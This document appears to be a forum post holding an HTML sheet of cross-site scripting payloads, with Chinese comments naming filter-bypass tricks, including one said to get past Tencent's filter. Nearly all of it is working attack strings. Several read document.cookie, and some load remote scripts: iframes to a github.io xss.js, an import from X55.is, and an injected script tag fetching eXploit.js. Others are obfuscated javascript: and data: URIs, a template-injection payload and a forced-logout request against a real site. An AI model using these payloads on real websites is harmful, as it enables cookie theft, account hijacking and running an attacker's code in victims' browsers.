a111111

aa<a href='//qq.com'>a</a>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- 用于反射处 https://x.com/BRuteLogic/status/1833154481476747592-->
    <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

    <iframe%20src="https://tupac-2pac.github.io/xss.js"></iframe>
    <iframe%20src="https://tupac-2pac.github.io/index.html"></iframe>
    <!--  -->

    %bf<script/%bf>alert(1);%bf</script/%bf>
    
    <!-- <u%20tabindex=1%20onbeforecopy=1>11</u> -->
    <!-- <u id=x tabindex=1 onfocus=alert(1)></u> -->

    <!-- <u id=x tabindex=1" onfocus=alert(1)> >11</u> -->

    <!-- <u%20id=x%20tabindex=1"><a%20href="1"%20style="color:red">点我看色色</a></u>
    <u%20id=x%20tabindex=1"><img%20src="https://study.163.com/passport/member/logout.htm"></u>

    // 自动触发
    <input/onfocusin=alert(document.cookie) autofocus/placeholder=''>
    <input/onfocusin=alert(document.cookie) autofocus/placeholder>
    <input/onfocusin=alert(document.cookie)/autofocus>
    
    <u%20id=x%20tabindex=1"><xmp>1</xmp></u>
    <u>111</u>
    <u>222</u> -->
    a<input%20onfocusin="prompt``">
    
    <a/href='javascript:top[`alert`](1)'>bbb</a>

    <a/href='javascript:window.self[`\x61\x6c\x65\x72\x74`](1);'>bbb</a>


    <a href="javascript:top['aler'+'t'](1)" target="_blank">aa1</a>    <!-- 加了target="_blank"的不能执行xss 可以试试csrf -->

    <a href="javascript:top['aler'+'t'](1)">aaa</a>

    <a href="javascript:top['alert'](1)">bbb</a>

    <a/href="javascript:top[`console.log`](1)">bbb</a>
    </textarea><u>aaa</u><a/href='javascript:top[`alert`](1)'>bbb</a>

    <img/src/onerror=console.log/*1337*/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;**&sol;(3)>

<!-- 火狐专用 -->
<a href='' target='_blank' download>a</a>
<a href='' download>a</a>

<!-- 鼠标中键弹窗 -->
<a href='javascript:alert()'>a</a>



<a/href="javascript:confirm()">确认</a><br/>
<a href='&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#51;&#51;&#51;&#41;'>HTML转码</a>

<svg/onload=alert()></svg>

<input%20onfocusin=alert(document.cookie)%0a>

<!-- 腾讯xss绕过 -->
<img/src/onerror%1a=a%1alert(1)>

<img/src/onerror=alert(document%2ecookie)>
<script>
    
</script>
<input/oninput='alert/*(*/(/*)*/)'>
    
    <img src="x" onerror="eval(atob('YWxlcnQoJ3h4cycp'));">

<a href='jAvascript:xxx:alert(1)'>sss</a>

<a href="jAvascript:x:window.self['a'+'l'+'e'+'rt'](1);">test</a>


<a href='javascript:x:window.self["\x61\x6c\x65\x72\x74"](document.cookie);'>test</a>

<svg onload="javascript:x:window.self['a'+'l'+'e'+'rt'](1)">

<svg oNload="javascript:top['alert'](10)">

    <iframe/src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>

    <img src="asdsaddd"onerror="javascript:s:window.self['a'+'l'+'e'+'rt'](33)">

    <!-- <u%20id=x%20tabindex=1"><a%20href=x%20onmouseover="alert('xss');">1</a></u> -->
    <img/src=x/onerror=console.log(1)>

    <div class="col-lg-8">
        <textarea name="ad3" class="form-control col-lg-12" placeholder="ad-2"></textarea>
        </div>
    
    <!-- <u id=x tabindex=1 onfocus=top['ale'+'rt'](2222)>22</u> -->

   

    <!-- 
        <u%20id=x%20tabindex=1%20onfocus=top['ale'+'rt'](2222)>22</u>
     -->

    <br>

    "><img/src/onerror=alert(document.domain)>
    <input%20onfocusin=alert(document.cookie)%0a>
    
    <!-- 
        %22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E
     -->
     <img%0dg%20src%20one%0drror=al%0dert(1)>

     <input/oninput=_=alert,_(1)>

     <input oninput=alert(1) value=xss>
<input/oninput=alert(1)>
<svg+on/load=alert()//

<svg onload=alert()//

<svg onload=alert()></svg>//

<input autofocus="" onfocus="alert();" />

<marquee onstart=confirm(1);//在firefox下有效>

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">


<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);>

{{constructor.constructor('alert(`XSS`)')()}}

?cc=xxxx%22};%0Avar%20a%20=%20%27aler%27,b=%27t(document%27,c='.cookie)';%0Avar%20d%20=%20a.concat(b).concat(c);;%0AFunction(d)();//

ed2k:/‚žÃ¦Â€Â§ -->
<input onclick="({x:'ale',y:'rt€Ã‚¼ -->
<input onclick="[window['ale'+'rt']].map(f=>f(document['co'+'okie']))">


<!-- 1. 大小写变化 -->
<a href="JavaSCRIPT:alert()">
<a href="javascript:alert()">
<a href="JaVaScRiPt:alert()">

<!-- 2. Unicode编码 -->
<a href="javascript:alert()">
<a href="javascript:alert()">

<!-- 3. URL编码 -->
<a href="%6A%61%76%61%73%63%72%69%70%74:alert()">
<a href="j%61v%61script:alert()">

<!-- 4. 添加空白字符 -->
<a href="javascript    :alert()">
<a href="javascript
:alert()">
<a href="javascript:    alert()">

<!-- 5. 注释变体 -->
<a href="javascript://comment
alert()">
<a href="javascript:/*comment*/alert()">

<!-- 6. 混合编码 -->
<a href="J%41V%41%53%43%52IPT:alert()">
<a href="java%73cript:alert()">

<!-- 7. 协议嵌套 -->
<a href="javascript:javascript:alert()">
<a href="javascript:void(javascript:alert())">

<!-- 8. 数据URI -->
<a href="data:text/javascript,alert()">
<a href="data:,aler<u>aaaa</u>t()">

<!-- 9. 组合变体 -->
<a href="%6A%61%76%61%73%63%72%69%70%74:void(/**/alert())">
<a href="JaVa%53%43%52iPt:alert()">

</body>
</html>







投票a(2选1)
  • 1 0
  • 12 0
0人参与 截止时间:2025/04/10 10:25:48
广东省
浏览 102
收藏
点赞
分享
+1
+1
全部评论